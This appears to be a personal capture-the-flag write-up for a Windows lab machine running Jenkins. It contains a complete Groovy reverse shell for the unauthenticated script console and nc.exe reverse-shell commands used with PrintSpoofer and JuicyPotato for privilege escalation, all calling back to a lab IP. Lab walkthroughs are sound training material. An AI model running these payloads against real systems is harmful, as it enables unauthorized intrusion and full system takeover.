# TAKEAWAYS - Start with small wordlist with approx 30K entries, then step up to large wordlist with over 100K entries - Have multiple techniques for moving files to WIN target - Cycle through powershell options, `certutil`, and `smbserver` --- # Discover ports & services - `ping` test ![[images/Pasted image 20260310201755.png]] - NOTE: TTL for Windows - `nmap`scan - light ![[images/Pasted image 20260310202026.png]] - `nmap`scan - detailed ![[images/Pasted image 20260310202224.png]] - Ports 80, 50000: HTTP - Ports 135, 443: SMB # Port 445: SMB anon login - Failures ![[images/Pasted image 20260310202502.png]] - NOTE: WIN PRO 10 10586 ![[images/Pasted image 20260310202715.png]] # Port 80: Webserver - Visit page ![[images/Pasted image 20260310202828.png]] - Page source ![[images/Pasted image 20260310202841.png]] - Request-Response in `burp` ![[images/Pasted image 20260310203126.png]] - `whatweb` scan ![[images/Pasted image 20260310203407.png]] - `Nikto` scan ![[images/Pasted image 20260310203814.png]] - Directory fuzzing - raft-small lowercase ![[images/Pasted image 20260310203648.png]] - raft-medium ![[images/Pasted image 20260310203707.png]] - Sub-domain fuzzing - top1million-5000 ![[images/Pasted image 20260310203953.png]] - SQLi attempt with `' 1=1 --` ![[images/Pasted image 20260310204107.png]] - leaked stack trace with ASP.NET version and MSSQL version # Port 50000: Webserver - Visit page ![[images/Pasted image 20260310204820.png]] - Page source ![[images/Pasted image 20260310204837.png]] - Review Jetty 9.4.z for vulns ![[images/Pasted image 20260310205209.png]] - Request-Response in `burp` ![[images/Pasted image 20260310205318.png]] - Directory fuzzing - raft-medium ![[images/Pasted image 20260310211038.png]] - 2.3-medium ![[images/Pasted image 20260310211020.png]] - Found `/askjeeves` - Visit `http://TARGET:50000/askjeeves` ![[images/Pasted image 20260310211129.png]] - We are on a Jenkins CI/CD server - We are not logged in but we can reach the script console ![[images/Pasted image 20260310211200.png]] --- # Foothold - Insert a groovy script for a windows `cmd.exe` revshell as below ```groovy String host="10.10.14.197"; int port=9443; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` - BAM! We are on the box as `jeeves/kohsuke` ![[images/Pasted image 20260310212145.png]] - Internal enum - Privs and groups ![[images/Pasted image 20260310212030.png]] - NOTE: We have `SeImpersonatePrivelege` --> potato attacks are on the table - `systeminfo` ![[images/Pasted image 20260310212216.png]] --- # Privesc ## PrintSpoofer64 - Move`printspoofer64.exe` and `nc.exe` to target - Issues with `certutil` and upgrading to powershell to move over http - Try smbserver ![[images/Pasted image 20260310214604.png]] - Run below command on Windows target ```cmd .\PrintSpoofer64.exe -c "c:\users\public\nc.exe 10.10.14.197 9444 -e cmd.exe" ``` - Issues - won't run and no hit on listener ![[images/Pasted image 20260310215313.png]] - Try local privsec with below command ```cmd sc query Spooler #check is print spooler is running PrintSpoofer64.exe -i -c cmd.exe ``` - Confirmed `Spooler` service is running ![[images/Pasted image 20260313202324.png]] - This is not going to work because we do not have GUI access ## JuicyPotato - Move `JuicyPotato.exe` and `nc.exe` to %TEMP% ```cmd c:\Users\kohsuke\AppData\Local\Temp\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\Users\kohsuke\AppData\Local\Temp\nc.exe -e cmd.exe 10.10.14.197 9443" -t * ``` - That worked! ![[images/Pasted image 20260313203926.png]] - Needed the absolute full path - Cannot directly read `root.txt` ? ![[images/Pasted image 20260313204006.png]] - Run `dir /r` ![[images/Pasted image 20260313204318.png]] - There it is but how do we read it? - `type hm.txt:root.txt:$DATA` does not work - Try `more < hm.txt:root.txt:$DATA` - This is the ticket!